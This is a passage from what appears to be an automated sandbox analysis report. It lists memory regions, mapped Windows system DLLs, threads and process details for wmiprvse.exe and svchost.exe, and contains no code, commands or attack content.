region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 1520
start_va = 0x7ffa13320000
end_va = 0x7ffa13389fff
monitored = 0
entry_point = 0x7ffa13356d50
region_type = mapped_file
name = "bcryptprimitives.dll"
filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll")
Region:
id = 1521
start_va = 0x7ffa13390000
end_va = 0x7ffa133d2fff
monitored = 0
entry_point = 0x7ffa133a4b50
region_type = mapped_file
name = "cfgmgr32.dll"
filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll")
Region:
id = 1522
start_va = 0x7ffa13cc0000
end_va = 0x7ffa13d5cfff
monitored = 0
entry_point = 0x7ffa13cc78a0
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 1523
start_va = 0x7ffa13d80000
end_va = 0x7ffa13ed5fff
monitored = 0
entry_point = 0x7ffa13d8a8d0
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 1524
start_va = 0x7ffa13ee0000
end_va = 0x7ffa14065fff
monitored = 0
entry_point = 0x7ffa13f2ffc0
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 1525
start_va = 0x7ffa14070000
end_va = 0x7ffa140cafff
monitored = 0
entry_point = 0x7ffa140838b0
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 1526
start_va = 0x7ffa14220000
end_va = 0x7ffa142c6fff
monitored = 0
entry_point = 0x7ffa1422b4d0
region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll")
Region:
id = 1527
start_va = 0x7ffa14340000
end_va = 0x7ffa145bcfff
monitored = 0
entry_point = 0x7ffa14414970
region_type = mapped_file
name = "combase.dll"
filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll")
Region:
id = 1528
start_va = 0x7ffa145c0000
end_va = 0x7ffa146dbfff
monitored = 0
entry_point = 0x7ffa146002b0
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 1529
start_va = 0x7ffa146e0000
end_va = 0x7ffa1474afff
monitored = 0
entry_point = 0x7ffa146f90c0
region_type = mapped_file
name = "ws2_32.dll"
filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")
Region:
id = 1530
start_va = 0x7ffa147c0000
end_va = 0x7ffa14880fff
monitored = 0
entry_point = 0x7ffa147e0da0
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 1531
start_va = 0x7ffa15090000
end_va = 0x7ffa15136fff
monitored = 0
entry_point = 0x7ffa150a58d0
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 1532
start_va = 0x7ffa15160000
end_va = 0x7ffa1520cfff
monitored = 0
entry_point = 0x7ffa151781a0
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 1533
start_va = 0x7ffa16770000
end_va = 0x7ffa16930fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Thread:
id = 98
os_tid = 0x10c8
Thread:
id = 99
os_tid = 0x10c4
Thread:
id = 100
os_tid = 0x10c0
Thread:
id = 101
os_tid = 0x10bc
Thread:
id = 102
os_tid = 0x10b8
Thread:
id = 103
os_tid = 0x10b4
Thread:
id = 104
os_tid = 0x10b0
[0207.583] ?AddRef@?$CImpl@UIWbemObjectTextSrc@@VCWmiObjectTextSrc@@@@UEAAKXZ () returned 0x2
Thread:
id = 105
os_tid = 0x10ac
Thread:
id = 106
os_tid = 0x10a4
Process:
id = "9"
image_name = "wmiprvse.exe"
filename = "c:\\windows\\system32\\wbem\\wmiprvse.exe"
page_root = "0xe373000"
os_pid = "0x7c4"
os_integrity_level = "0x4000"
os_privileges = "0xe60b1e890"
monitor_reason = "rpc_server"
parent_id = "6"
os_parent_pid = "0x274"
cmd_line = "C:\\Windows\\system32\\wbem\\wmiprvse.exe -Embedding"
cur_dir = "C:\\Windows\\system32\\"
os_username = "NT AUTHORITY\\SYSTEM"
bitness = "32"
os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xe], "NT SERVICE\\BITS" [0xe], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\DcpSvc" [0xa], "NT SERVICE\\dmwappushservice" [0xa], "NT SERVICE\\DoSvc" [0xe], "NT SERVICE\\DsmSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\lfsvc" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\NcaSvc" [0xa], "NT SERVICE\\NetSetupSvc" [0xe], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\RetailDemo" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\UsoSvc" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wlidsvc" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT SERVICE\\XboxNetApiSvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000abff" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe]
Region:
id = 1536
start_va = 0x10000
end_va = 0x1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 1537
start_va = 0x20000
end_va = 0x26fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000020000"
filename = ""
Region:
id = 1538
start_va = 0x30000
end_va = 0x44fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 1539
start_va = 0x50000
end_va = 0xcffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000050000"
filename = ""
Region:
id = 1540
start_va = 0xd0000
end_va = 0xd3fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000d0000"
filename = ""
Region:
id = 1541
start_va = 0xe0000
end_va = 0xe0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000e0000"
filename = ""
Region:
id = 1542
start_va = 0xf0000
end_va = 0xf1fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000f0000"
filename = ""
Region:
id = 1543
start_va = 0x100000
end_va = 0x1bdfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 1544
start_va = 0x1c0000
end_va = 0x1c6fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001c0000"
filename = ""
Region:
id = 1545
start_va = 0x1d0000
end_va = 0x1d0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001d0000"
filename = ""
Region:
id = 1546
start_va = 0x1e0000
end_va = 0x1e0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001e0000"
filename = ""
Region:
id = 1547
start_va = 0x1f0000
end_va = 0x1f4fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "user32.dll.mui"
filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui")
Region:
id = 1548
start_va = 0x200000
end_va = 0x3fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000200000"
filename = ""
Region:
id = 1549
start_va = 0x480000
end_va = 0x480fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000480000"
filename = ""
Region:
id = 1550
start_va = 0x490000
end_va = 0x490fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000490000"
filename = ""
Region:
id = 1551
start_va = 0x4a0000
end_va = 0x4a0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000004a0000"
filename = ""
Region:
id = 1552
start_va = 0x500000
end_va = 0x5fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000500000"
filename = ""
Region:
id = 1553
start_va = 0x600000
end_va = 0x6bffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000600000"
filename = ""
Region:
id = 1554
start_va = 0x720000
end_va = 0x72ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000720000"
filename = ""
Region:
id = 1555
start_va = 0x730000
end_va = 0xa66fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 1556
start_va = 0xa70000
end_va = 0xbf7fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000a70000"
filename = ""
Region:
id = 1557
start_va = 0xc00000
end_va = 0xd80fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000c00000"
filename = ""
Region:
id = 1558
start_va = 0xd90000
end_va = 0xe0ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000d90000"
filename = ""
Region:
id = 1559
start_va = 0xe10000
end_va = 0xf0ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000e10000"
filename = ""
Region:
id = 1560
start_va = 0xf10000
end_va = 0xf8ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000f10000"
filename = ""
Region:
id = 1561
start_va = 0xf90000
end_va = 0x100ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000f90000"
filename = ""
Region:
id = 1562
start_va = 0x1010000
end_va = 0x108ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001010000"
filename = ""
Region:
id = 1563
start_va = 0x1090000
end_va = 0x110ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001090000"
filename = ""
Region:
id = 1564
start_va = 0x1110000
end_va = 0x118ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001110000"
filename = ""
Region:
id = 1565
start_va = 0x1190000
end_va = 0x120ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001190000"
filename = ""
Region:
id = 1566
start_va = 0x7ffe0000
end_va = 0x7ffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 1567
start_va = 0x7df5ffec0000
end_va = 0x7df5fffbffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00007df5ffec0000"
filename = ""
Region:
id = 1568
start_va = 0x7df5fffc0000
end_va = 0x7df5fffe2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00007df5fffc0000"
filename = ""
Region:
id = 1569
start_va = 0x7df5ffff0000
end_va = 0x7ff5fffeffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00007df5ffff0000"
filename = ""
Region:
id = 1570
start_va = 0x7ff7aedf0000
end_va = 0x7ff7aee6ffff
monitored = 0
entry_point = 0x7ff7aee05f50
region_type = mapped_file
name = "wmiprvse.exe"
filename = "\\Windows\\System32\\wbem\\WmiPrvSE.exe" (normalized: "c:\\windows\\system32\\wbem\\wmiprvse.exe")
Region:
id = 1571
start_va = 0x7ff9fbb10000
end_va = 0x7ff9fbb5cfff
monitored = 0
entry_point = 0x7ff9fbb1b470
region_type = mapped_file
name = "pdh.dll"
filename = "\\Windows\\System32\\pdh.dll" (normalized: "c:\\windows\\system32\\pdh.dll")
Region:
id = 1572
start_va = 0x7ff9fbb60000
end_va = 0x7ff9fbb84fff
monitored = 1
entry_point = 0x7ff9fbb75dc0
region_type = mapped_file
name = "wmiperfclass.dll"
filename = "\\Windows\\System32\\wbem\\WmiPerfClass.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiperfclass.dll")
Region:
id = 1573
start_va = 0x7ff9ff9c0000
end_va = 0x7ff9ff9fcfff
monitored = 1
entry_point = 0x7ff9ff9cb760
region_type = mapped_file
name = "wmiprov.dll"
filename = "\\Windows\\System32\\wbem\\wmiprov.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiprov.dll")
Region:
id = 1574
start_va = 0x7ffa07ad0000
end_va = 0x7ffa07ae5fff
monitored = 0
entry_point = 0x7ffa07ad55e0
region_type = mapped_file
name = "ncobjapi.dll"
filename = "\\Windows\\System32\\ncobjapi.dll" (normalized: "c:\\windows\\system32\\ncobjapi.dll")
Region:
id = 1575
start_va = 0x7ffa07c90000
end_va = 0x7ffa07cb4fff
monitored = 0
entry_point = 0x7ffa07c99900
region_type = mapped_file
name = "wmiutils.dll"
filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll")
Region:
id = 1576
start_va = 0x7ffa07cc0000
end_va = 0x7ffa07cd3fff
monitored = 0
entry_point = 0x7ffa07cc1800
region_type = mapped_file
name = "wbemsvc.dll"
filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll")
Region:
id = 1577
start_va = 0x7ffa07ce0000
end_va = 0x7ffa07dd5fff
monitored = 0
entry_point = 0x7ffa07d19590
region_type = mapped_file
name = "fastprox.dll"
filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll")
Region:
id = 1578
start_va = 0x7ffa08390000
end_va = 0x7ffa083a0fff
monitored = 0
entry_point = 0x7ffa08392fc0
region_type = mapped_file
name = "wbemprox.dll"
filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll")
Region:
id = 1579
start_va = 0x7ffa09490000
end_va = 0x7ffa0950efff
monitored = 1
entry_point = 0x7ffa094a7110
region_type = mapped_file
name = "wbemcomn.dll"
filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll")
Region:
id = 1580
start_va = 0x7ffa0e8a0000
end_va = 0x7ffa0e903fff
monitored = 0
entry_point = 0x7ffa0e8b5ae0
region_type = mapped_file
name = "wevtapi.dll"
filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll")
Region:
id = 1581
start_va = 0x7ffa0f3e0000
end_va = 0x7ffa0f3f0fff
monitored = 0
entry_point = 0x7ffa0f3e3320
region_type = mapped_file
name = "wmiclnt.dll"
filename = "\\Windows\\System32\\wmiclnt.dll" (normalized: "c:\\windows\\system32\\wmiclnt.dll")
Region:
id = 1582
start_va = 0x7ffa12280000
end_va = 0x7ffa122b0fff
monitored = 0
entry_point = 0x7ffa12287d10
region_type = mapped_file
name = "ntmarta.dll"
filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll")
Region:
id = 1583
start_va = 0x7ffa12c20000
end_va = 0x7ffa12c48fff
monitored = 0
entry_point = 0x7ffa12c34530
region_type = mapped_file
name = "bcrypt.dll"
filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll")
Region:
id = 1584
start_va = 0x7ffa12e10000
end_va = 0x7ffa12e1efff
monitored = 0
entry_point = 0x7ffa12e13210
region_type = mapped_file
name = "kernel.appcore.dll"
filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll")
Region:
id = 1585
start_va = 0x7ffa13130000
end_va = 0x7ffa13317fff
monitored = 0
entry_point = 0x7ffa1315ba70
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 1586
start_va = 0x7ffa13320000
end_va = 0x7ffa13389fff
monitored = 0
entry_point = 0x7ffa13356d50
region_type = mapped_file
name = "bcryptprimitives.dll"
filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll")
Region:
id = 1587
start_va = 0x7ffa13cc0000
end_va = 0x7ffa13d5cfff
monitored = 0
entry_point = 0x7ffa13cc78a0
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 1588
start_va = 0x7ffa13d80000
end_va = 0x7ffa13ed5fff
monitored = 0
entry_point = 0x7ffa13d8a8d0
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 1589
start_va = 0x7ffa13ee0000
end_va = 0x7ffa14065fff
monitored = 0
entry_point = 0x7ffa13f2ffc0
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 1590
start_va = 0x7ffa14070000
end_va = 0x7ffa140cafff
monitored = 0
entry_point = 0x7ffa140838b0
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 1591
start_va = 0x7ffa14220000
end_va = 0x7ffa142c6fff
monitored = 0
entry_point = 0x7ffa1422b4d0
region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll")
Region:
id = 1592
start_va = 0x7ffa14340000
end_va = 0x7ffa145bcfff
monitored = 0
entry_point = 0x7ffa14414970
region_type = mapped_file
name = "combase.dll"
filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll")
Region:
id = 1593
start_va = 0x7ffa145c0000
end_va = 0x7ffa146dbfff
monitored = 0
entry_point = 0x7ffa146002b0
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 1594
start_va = 0x7ffa146e0000
end_va = 0x7ffa1474afff
monitored = 0
entry_point = 0x7ffa146f90c0
region_type = mapped_file
name = "ws2_32.dll"
filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")
Region:
id = 1595
start_va = 0x7ffa147c0000
end_va = 0x7ffa14880fff
monitored = 0
entry_point = 0x7ffa147e0da0
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 1596
start_va = 0x7ffa15090000
end_va = 0x7ffa15136fff
monitored = 0
entry_point = 0x7ffa150a58d0
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 1597
start_va = 0x7ffa15160000
end_va = 0x7ffa1520cfff
monitored = 0
entry_point = 0x7ffa151781a0
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 1598
start_va = 0x7ffa16770000
end_va = 0x7ffa16930fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Thread:
id = 107
os_tid = 0x288
Thread:
id = 108
os_tid = 0x644
Thread:
id = 109
os_tid = 0x7fc
Thread:
id = 110
os_tid = 0x784
Thread:
id = 111
os_tid = 0x7a8
Thread:
id = 112
os_tid = 0x428
Thread:
id = 113
os_tid = 0x568
Thread:
id = 114
os_tid = 0x6fc
Process:
id = "10"
image_name = "svchost.exe"
filename = "c:\\windows\\system32\\svchost.exe"
page_root = "0x3826f000"
os_pid = "0x354"
os_integrity_level = "0x4000"
os_privileges = "0xe60b1e890"
monitor_reason = "created_scheduled_job"
parent_id = "3"
os_parent_pid = "0x210"
cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs"
cur_dir = "C:\\Windows\\system32\\"
os_username = "NT AUTHORITY\\SYSTEM"
bitness = "32"
os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xe], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\DcpSvc" [0xa], "NT SERVICE\\dmwappushservice" [0xa], "NT SERVICE\\DoSvc" [0xa], "NT SERVICE\\DsmSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\lfsvc" [0xa], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\NcaSvc" [0xa], "NT SERVICE\\NetSetupSvc" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\RetailDemo" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\UsoSvc" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wlidsvc" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT SERVICE\\XboxNetApiSvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000ae67" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe]
Region:
id = 1717
start_va = 0x10000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 1718
start_va = 0x30000
end_va = 0x44fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 1719
start_va = 0x50000
end_va = 0xcffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000050000"
filename = ""
Region:
id = 1720
start_va = 0xd0000
end_va = 0xd3fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000d0000"
filename = ""
Region:
id = 1721
start_va = 0xe0000
end_va = 0xe0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000e0000"
filename = ""
Region:
id = 1722
start_va = 0xf0000
end_va = 0xf1fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000f0000"
filename = ""
Region:
id = 1723
start_va = 0x200000
end_va = 0x3fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000200000"
filename = ""
Region:
id = 1724
start_va = 0x7ffe0000
end_va = 0x7ffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 1725
start_va = 0x7df5fffc0000
end_va = 0x7df5fffe2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00007df5fffc0000"
filename = ""
Region:
id = 1726
start_va = 0x7df5ffff0000
end_va = 0x7ff5fffeffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00007df5ffff0000"
filename = ""
Region:
id = 1727
start_va = 0x7ff756e70000
end_va = 0x7ff756e7cfff
monitored = 0
entry_point = 0x7ff756e73980
region_type = mapped_file
name = "svchost.exe"
filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe")
Region:
id = 1728
start_va = 0x7ff8d9050000
end_va = 0x7ff8d9210fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 1846
start_va = 0x100000
end_va = 0x116fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000100000"
filename = ""
Region:
id = 1847
start_va = 0x400000
end_va = 0x5fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000400000"
filename = ""
Region:
id = 1848
start_va = 0x400000
end_va = 0x4fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000400000"
filename = ""
Region:
id = 1849
start_va = 0x7ff8d7620000
end_va = 0x7ff8d76ccfff
monitored = 0
entry_point = 0x7ff8d76381a0
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 1850
start_va = 0x7ff8d5f20000
end_va = 0x7ff8d6107fff
monitored = 0
entry_point = 0x7ff8d5f4ba70
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 1851
start_va = 0x10000
end_va = 0x1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 1852
start_va = 0x7df5ffec0000
end_va = 0x7df5fffbffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00007df5ffec0000"
filename = ""
Region:
id = 1853
start_va = 0x120000
end_va = 0x1ddfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 1854
start_va = 0x7ff8d6f80000
end_va = 0x7ff8d6fdafff
monitored = 0
entry_point = 0x7ff8d6f938b0
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 1855
start_va = 0x7ff8d76f0000
end_va = 0x7ff8d780bfff
monitored = 0
entry_point = 0x7ff8d77302b0
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 1856
start_va = 0x500000
end_va = 0x57ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000500000"
filename = ""
Region:
id = 1857
start_va = 0x7ff8d4810000
end_va = 0x7ff8d4903fff
monitored = 0
entry_point = 0x7ff8d481a960
region_type = mapped_file
name = "ucrtbase.dll"
filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll")
Region:
id = 1858
start_va = 0x7ff8d7810000
end_va = 0x7ff8d7a8cfff
monitored = 0
entry_point = 0x7ff8d78e4970
region_type = mapped_file
name = "combase.dll"
filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll")
Region:
id = 1859
start_va = 0x7ff8d7580000
end_va = 0x7ff8d761cfff
monitored = 0
entry_point = 0x7ff8d75878a0
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 1860
start_va = 0x7ff8d6110000
end_va = 0x7ff8d6179fff
monitored = 0
entry_point = 0x7ff8d6146d50
region_type = mapped_file
name = "bcryptprimitives.dll"
filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll")
Region:
id = 1861
start_va = 0x580000
end_va = 0x756fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000580000"
filename = ""
Region:
id = 1862
start_va = 0x760000
end_va = 0x95ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000760000"
filename = ""
Region:
id = 1863
start_va = 0x800000
end_va = 0x8fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000800000"
filename = ""
Region:
id = 1864
start_va = 0x580000
end_va = 0x65cfff
monitored = 0
entry_point = 0x5de0b0
